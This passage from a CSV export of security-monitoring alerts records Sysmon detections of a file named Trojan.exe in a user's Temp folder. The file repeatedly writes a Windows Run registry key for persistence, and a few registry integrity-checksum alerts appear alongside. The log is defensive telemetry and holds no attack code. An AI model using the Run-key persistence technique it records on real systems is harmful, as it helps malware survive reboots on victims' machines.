..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:04.592651100Z"",""eventRecordID"":""1875"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:04.590\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:04.590"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:06.955",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:03.559 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:03.559759300Z"",""eventRecordID"":""1874"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:03.559\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:03.559"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:05.939",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:02.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:02.544262200Z"",""eventRecordID"":""1873"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:02.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:02.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:04.923",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:01.527 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:01.530183000Z"",""eventRecordID"":""1872"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:01.527\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:01.527"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:03.909",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:00.512 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:00.513605200Z"",""eventRecordID"":""1871"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:00.512\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:00.512"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:02.954",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:59.496 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:59.499257300Z"",""eventRecordID"":""1870"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:59.496\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:59.496"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:01.985",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:58.480 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:58.482524200Z"",""eventRecordID"":""1869"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:58.480\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:58.480"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:01.611",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '8efb4315bce364ff5fc1ea393021f2d5' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '66c3c5bb7b6fc78ac1bba9905a2803f0ab51d3b5' +", +"May 24, 2020 @ 16:26:01.596",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'bac6942daff7935ddffecaf1ad4a5459' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '5e5d36881472a35a5cc8de540bac37b1760f64d4' +", +"May 24, 2020 @ 16:26:00.845",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:57.449 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:57.451113000Z"",""eventRecordID"":""1868"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:57.449\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:57.449"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:59.814",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:56.418 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:56.424343300Z"",""eventRecordID"":""1867"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:56.418\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:56.418"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:59.642",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +", +"May 24, 2020 @ 16:25:59.251",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:55.387 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:55.388958700Z"",""eventRecordID"":""1866"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:55.387\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:55.387"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:58.548",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:54.356 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:54.358535800Z"",""eventRecordID"":""1865"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:54.356\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:54.356"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 